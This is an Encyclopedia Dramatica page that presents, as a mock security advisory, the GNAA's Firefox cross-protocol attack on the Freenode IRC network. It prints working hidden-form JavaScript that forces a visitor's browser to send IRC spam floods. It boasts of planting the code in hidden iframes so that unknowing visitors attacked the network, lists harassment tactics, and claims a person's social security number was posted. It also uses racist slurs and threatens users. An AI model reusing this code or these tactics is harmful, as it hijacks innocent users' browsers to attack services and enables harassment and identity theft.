⚠️ Encyclopedia Dramatica is currently being restored by automated scripts ⚠️

There's been a lot of questions as to what's going on with the site and what comes next. So we have this (ordered) roadmap of what's being worked on and what's to come. This will be updated until the roadmap is complete as Æ has a lot of missing features and ideas that I'd like to fix in regards to its offerings before I implement big plans for the site's popularity and well-being in 2021.

Æ Roadmap

  • Content restoration (Mostly done, few things missing that will be restored sporadically)
  • Image restoration (Being run in background, nothing I can do cept wait)
  • Æ Imageboard (Currently being worked on)
  • Mediawiki upgrade and backend fixes
  • .onion domain for Tor-friendly editing and viewing
  • CSS overhaul (Fixing things like the videos on mobile, and overall a rehaul of the wiki's look to be more friendly to readers)
  • Paid bounty board for new articles (Won't be managed by me for legal reasons however I will ensure it runs smoothly)
  • Anonymous phone # service for those seeking ban evades from Twitter as well as a phone number not tied to their name (more details at launch)

  • Currently we are nearing our annual LLC renewal fee ($650) as well throwing the funds required for these other changes and aspects. If you would like to support Æ consider purchasing a copy of The Hustler's Bible or securing some Merch. Donating is also appreciated however I would rather give something back as per the two options above.

    If you have any questions you can join our public Telegram chat to DM me privately or @ me in chat.

    You can also email me via [email protected]

    Merch notes: Thank you to all who have purchased merch. We will ship late January or mid February depending on our provider's speed.

    Here's to setting the world on fire in 2021! - aediot



    Firefox XPS IRC Attack

    From Encyclopedia Dramatica
    Jump to navigation Jump to search
    Goatse security.png
    GOATSE SECURITY TEAM 0-DAY EXPLOIT ADVISORY
    irc.gnaa.eu #gnaa to discuss security consulting arrangements

    Since it's been copied to much less sweet websites (without credit or sourcing), it's time to write up a security advisory (I believe the publishing of infosec advisories is a first for Encyclopedia Dramatica, lulz) and let everybody know whats up. Firefox has a hole in its port blocking scheme that allows a clever troll to spam an unsuspecting IRC daemon with whatever he desires. The GNAA leveraged this vulnerability to bring complete ruin upon the Freenode IRC network.

    How it works

    A new implementation of cross-protocol scripting was used to automatically fill a HTTP form to send a POST to port 6667 and shove a bunch of IRC commands down the socket. Although Mozilla banned most of the fun ports years ago, 6667 -- the default port for IRC servers, wasn't on the list. In all likelihood, this the first use of this attack in the wild, ever.

    This attack has a lot of implications outside of IRC. Think of all the other TCP ports that are in common use these days that aren't covered in Mozilla's banned list. Most protocols do not use a cookied handshake of any sort to initiate a connection. The sheer amount of potential that exists in turning a web browser into a device speaking an arbitrary protocol is huge. For example, SIP protocol can run on TCP these days. You can make someone's web browser interact with a SIP device. All sorts of potentially criminal and civil liability generating applications. Expect more of them to appear out of the GNAA labs in the future!

    [-+]Example source (click plus to uncollapse)


    <form action="http://irc.freenode.net:6667/" method="post" enctype="text/plain"> 
    <textarea style="display:none" id="x" name="x"></textarea>
    <input type="submit" style="display:none;" />
    </form>
    <script type="text/javascript">
    function randomString(length) {
            var chars = "abcdefghiklmnopqrstuvwxyz";
            var randomstring = '';
            for (var i=0; i<length; i++) {
                    var rnum = Math.floor(Math.random() * chars.length);
                    randomstring += chars.substring(rnum,rnum+1);
            }
            return randomstring;
    }
    n=randomString(Math.floor(Math.random()*10+3));
    i=randomString(Math.floor(Math.random()*10+3));
    te=document.getElementById('x');
    te.value = '\nUSER '+i+' 8 * :'+n+'\nNICK '+n+'\nJOIN #freenode\n'+new Array(99).join('PRIVMSG #freenode :Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.gnaa.eu #gnaa ....... My name is '+n+', and I hope you have a nice day.\n');
    te.parentNode.submit()
    </script> 

    Browser rundown

    IRCD rundown

    • Efnet, no longer affected (took them about an hour to enact countermeasures)
    • Buttesnet, no longer affected. (took them about 4 hours to enact countermeaures)
    • OFTC, no longer affected (took them about a day)
    • Freenode, over 1 month to enact countermeasures with a server upgrade from Hyperion to ircd-seven, after which they immediately got raped by GNAA. (LOL)


    Best things that were done to Freenode

    • Embedded exploit in hidden iframes in everyone's favorite shock site, leading to thousands of hosts joining network.
    • Messaged Freenode opers blog links with hidden iframes and watched as they all k-lined eachother
    File:Lolgrowl.jpg
    What the attack looks like to a Typical Macintosh User
    • Switched up the floods to CTCP and made users flood themselves off with CTCP replies over and over again until they were k-lined from servers with reconnect limits.
    • Flooded freenode with channel names full of legitimate users implying they were troll channels, making paranoid freenode ops ban their own legitimate users.
    • After seeing a Freenode staff member make a bot that automatically k-lined flooding users in a channel with wildcards, manually flooded the channel from a shell account and watched it ban an entire TLD, taking a gigantic swath of the network with it.
    • Made Freenode staff xenophobic and paranoid and watched them k-line anyone who dared ask for assistance or complain about the floods.
    • Making Freenode users self-propagate the link on third party blogging services with warnings to not click the link (we got huge referrals from Twitter, thanks dudes)

    You are mean. Why did you torture freenode so much?

    Freenode/PDPC is a fucking fraud. In the entire time it has existed, it has never released financial statements. Rob Levin used PDPC to embezzle hundreds of thousands of dollars which should have been given to open source development projects. He faked his death, and came back in this "christel" incarnation in Europe to continue embezzling from Freenode. It is all a big lie, and these people should be thrown into ovens. EFnet continuously hosts 100x the number of users that Freenode does without constant netsplits and incidents. OFTC does not sit there and continuously beg for money. Get off of Freenode. Go to somewhere that is ethical.

    Beyond that, the trolling scene has a lot invested in ruining Freenode. I posted Rob Levin's social security number, enabling the series of identity thefts and ruins that forced the man to fake his death. With Bantown, I watched Jmax sniff lilo's oper block password off the wire and absolutely wreck the network in it. I also watched Grog (of the GNAA at the time, until he was excommunicated by the former tyrant timecop) convince lilo that he was the founder of MySQL, get opered up, wreck the network. Then he convinced lilo that his daughter's computer was hacked, apologized, got his o:line back and wrecked the network again.

    In short, wrecking Freenode is a long and glorious troll tradition that stretches backwards for time immemorial. If you associate with Freenode, use Freenode, or support Freenode, you are a target. You are asking to be destroyed.

    See Also

    External Links

    Non-English sources

    100px Firefox XPS IRC Attack is part of a series on the Gay Nigger Association of America.

    MembersVictoriesRelated

    LiteralKaMeepsheepweevHipcrimeOliver HartJmaxTimecopGrogDiKKyl0deslothjesuitxRucasfl0ssBLACK_MANzaiger

    JEWS DID WTCFirefox XPS IRC AttackSANDYLOOTCREW2012 GNAA Tumblr RuinCut4BieberAngryjediFluttershyMuZemikeThe Great Dumbledore Dies Meme of 2005Diego GrezHighInBCSeleryMore..

    GrogvDiKKvLast MeasureLinux for NiggersDangermanGayniggers from Outer SpaceGoatse SecurityKLULZNCFSlashdot

    Firefox XPS IRC Attack
    is part of a series on
    epic events and trolls170px
    Epic Win

    #Cut4Bieber2012 GNAA Tumblr RuinAFI Incident/b/lackup/b/spaceBadfurDay VS. DeviantARTBullet to the Head of the NRADub the DewThe Chanology ExperimentsCosmicJohn CL ExperimentChan DeathdAmn ExploitDeviantART Policy Changes#ExilePitbullFirefox XPS IRC AttackGuatamala DayHabbo Raid 2006Habbo Raid 2007Hitler: The Babe withinInternet Vigilante GroupJEWS DID WTCJudith Park's Leaked PhotosLiveJournal Buyout 2005Muhammed Sex Simulator 2015LiveJournal Buyout 2007LiveJournal StrikethroughThe Rolling : MTV Gets Rickroll'dOld /b/ DayOlympic FlameOperation LIONCASHOperation YouTubePokéclipsePROJECT CHANOLOGYPwnest PetersRFJason CL ExperimentLJ Abuse Conspiracy#SANDYLOOTCREWSharecash DDoSY!Gallery Bans AnthroYouTube Civil WarYouTube Furry WarAgile2013Waterproof iOS7The FappeningHitler TopTensEbola-chanHe Will Not Divide Us

    Epic Fail

    4chan's Death and Revival/b/'s Cancer/b/-dayBoston Fail PartyChanocalypse NaowDshockerEm/b/assy Security LeakGoddessTrinity[email protected]Italian Wikipedia Publicity StuntOperation AntfuckOperation AwesomeOperation Blue CrayonOperation Falcon PunchPenis Pump Sex Scandal '06Perfection GirlShayminThe ED Civil WarThe Great Hack Of FacepunchThe Great ImageFap TrollRe/b/ootSonic-cideOperation Timebomb v2

    Matrix.gif

    Firefox XPS IRC Attack is part of a series on Programming.

    [2 L337 4 MEEnter the Matrix]

    Firefox XPS IRC Attack

    is part of a series on

    IRC

    Please visit the IRC PORTAL for more

    A-BC-DE-FG-HI-JK-LM-NO-P
    Q-RS-TU-VW-XY-Z#

    ED IRC.JPG

    Featured article March 7, 2010
    Preceded by
    HOW CAN SHE SLAP?!?
    Firefox XPS IRC Attack Succeeded by
    American Family Association